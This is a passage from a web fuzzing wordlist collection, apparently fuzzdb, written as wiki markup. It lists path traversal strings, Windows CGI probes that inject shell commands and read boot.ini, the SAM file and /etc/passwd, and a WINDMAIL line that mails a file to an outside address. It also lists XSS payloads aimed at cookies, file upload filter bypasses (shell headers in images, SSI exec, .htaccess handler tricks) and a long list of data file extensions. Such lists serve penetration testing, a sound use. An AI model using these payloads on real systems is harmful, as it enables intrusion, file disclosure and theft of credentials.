.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
